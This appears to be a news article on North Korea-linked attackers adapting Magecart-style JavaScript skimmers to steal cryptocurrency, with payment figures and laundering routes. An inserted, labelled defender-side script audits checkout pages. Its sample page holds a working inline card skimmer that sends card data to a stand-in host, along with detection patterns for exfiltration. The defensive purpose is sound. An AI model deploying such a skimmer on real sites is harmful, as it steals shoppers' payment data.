Lazarus E-Commerce Attackers Adapt Web Skimming for Stealing Cryptocurrency


Cybercriminals with apparent ties to North Korea who hit e-commerce shops in 2019 and 2020 to steal payment card data also tested functionality for stealing cryptocurrency, according to the cybersecurity firm Group-IB.

Group-IB's latest report builds on findings revealed in July 2020 by Dutch security firm Sansec, which reported that malicious infrastructure and, in many cases, malware were being used for Magecart-style attack campaigns that had previously been attributed to the Lazarus Group.

Lazarus - aka Hidden Cobra, Dark Seoul, Guardians of Peace, APT38, Bluenoroff, and a host of other names - refers to a group of hackers with apparent ties to the Pyongyang-based government officially known as the Democratic People's Republic of Korea, led by Kim Jong-Un.

Magecart-style attacks refer to using so-called digital card skimming or scraping tools - aka JavaScript sniffers - that attackers inject into victim organizations' e-commerce sites. Victims of such attacks have included jewelry and accessories retailer Claire's and Ticketmaster UK, among thousands of others.
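As an added defender-side example, not code from the article, Group-IB or Sansec: a small audit over a checkout page's HTML that flags the kinds of script additions a JS-sniffer injection typically leaves behind (script tags loaded from hosts outside the shop's allowlist, third-party scripts without Subresource Integrity, and inline scripts that both read payment or wallet fields and send data out). The allowlist hosts, the `attacker.invalid` endpoint and the sample page are constructed for the example.

```javascript
// Allowlist of hosts the shop legitimately loads scripts from (assumed).
const ALLOWED_SCRIPT_HOSTS = new Set(['shop.example', 'cdn.shop.example']);
// Skimmer traits: reads payment/wallet fields and sends them out. An
// inline script doing both is worth a manual look (heuristic, not proof).
const FIELD_HINTS = /card|cvv|cvc|expir|wallet|btc|ether/i;
const EXFIL_HINTS = /fetch\(|XMLHttpRequest|sendBeacon|new Image\(/;

function auditScripts(html) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (src) {
      let host = null;  // external script: check its host against the allowlist
      try { host = new URL(src[1], 'https://shop.example/').hostname; } catch {}
      if (!host || !ALLOWED_SCRIPT_HOSTS.has(host)) {
        findings.push({ kind: 'unknown-script-host', detail: src[1] });
      }
      // Third-party scripts without SRI can be swapped at the CDN unnoticed.
      if (host && host !== 'shop.example' && !/\bintegrity\s*=/i.test(attrs)) {
        findings.push({ kind: 'missing-sri', detail: src[1] });
      }
    } else if (FIELD_HINTS.test(body) && EXFIL_HINTS.test(body)) {
      findings.push({ kind: 'inline-field-exfil', detail: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed sample checkout page: one legitimate script, one injected
// inline sniffer, one script pulled from an attacker-controlled host.
const SAMPLE_CHECKOUT_HTML = `
<form id="checkout"><input name="card_number"><input name="cvv"></form>
<script src="https://cdn.shop.example/checkout.js" integrity="sha384-AAAA"></script>
<script>
  document.getElementById('checkout').addEventListener('submit', () => {
    const card = document.querySelector('[name=card_number]').value;
    fetch('https://attacker.invalid/collect', { method: 'POST', body: card });
  });
</script>
<script src="https://attacker.invalid/jquery.min.js"></script>`;

console.log(auditScripts(SAMPLE_CHECKOUT_HTML));
```

Running the audit on each deploy and diffing its output against the previous run turns a one-off check into a change monitor for the checkout page.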

Group-IB researchers stated that after reviewing the attack campaign discovered by Sansec, they also found signs suggesting that attackers had been experimenting with stealing not just payment card data but also cryptocurrency.

Group-IB reports that it found the same infrastructure being used, together with a modified version of the same JavaScript sniffer - aka JS-sniffer - that Sansec described in its report. Group-IB has dubbed the cryptocurrency-targeting campaign Lazarus BTC Changer. 

The attackers appear to have stolen relatively little cryptocurrency via the sites' customers: just $9,000 worth of Ethereum and $8,400 worth of bitcoins, Group-IB reports. Group-IB says those stolen funds appeared to have been routed to bitcoin cryptocurrency wallets allegedly owned by CoinPayments.net, "a payment gateway that allows users to conduct transactions involving bitcoin, Ethereum, Litecoin, and other cryptocurrencies." 

Lazarus may have used the site to launder the stolen funds by moving them to other cryptocurrency exchanges or wallets. The cybersecurity firm notes that CoinPayments' "know your customer" policy could help identify the individuals who initiated the transactions. The service's user agreement stipulates that individuals attest that they are not operating in or on behalf of anyone in a prohibited jurisdiction, which includes North Korea.